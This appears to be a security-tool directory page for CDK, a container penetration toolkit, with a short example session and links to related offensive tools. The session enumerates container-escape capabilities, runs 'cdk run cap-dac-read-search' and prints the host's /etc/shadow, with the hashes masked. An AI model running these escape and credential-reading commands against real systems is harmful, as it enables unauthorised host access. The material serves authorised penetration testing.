Screenshots
Example Usage
> ./cdk eva --full [*] Maybe you can exploit the *Capabilities* below: [!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation. [!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/. Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'. Critical - Possible Privileged Container Found. > ./cdk run cap-dac-read-search Running with target: /etc/shadow, ref: /etc/hostname ubuntu:$6$*******:19173:0:99999:7::: root:*:18659:0:99999:7::: daemon:*:18659:0:99999:7::: bin:*:18659:0:99999:7:::
See also
graphql-cop
Open Source
Security Auditor Utility for GraphQL APIs…
cve-search_mcp
Open Source
A Model Context Protocol (MCP) server for querying the CVE-Search API…
Impacket
Open Source
Kali
Collection of Python classes for working with network protocols. Includes tools for SMB, MSRPC, LDAP…
WADComs.github.io
Open Source
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and the…
Evil-WinRM
Open Source
Kali
Full-featured WinRM shell for hacking and penetration testing. Supports pass-the-hash, file upload/d…
bettercap
Free
Kali
The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM a…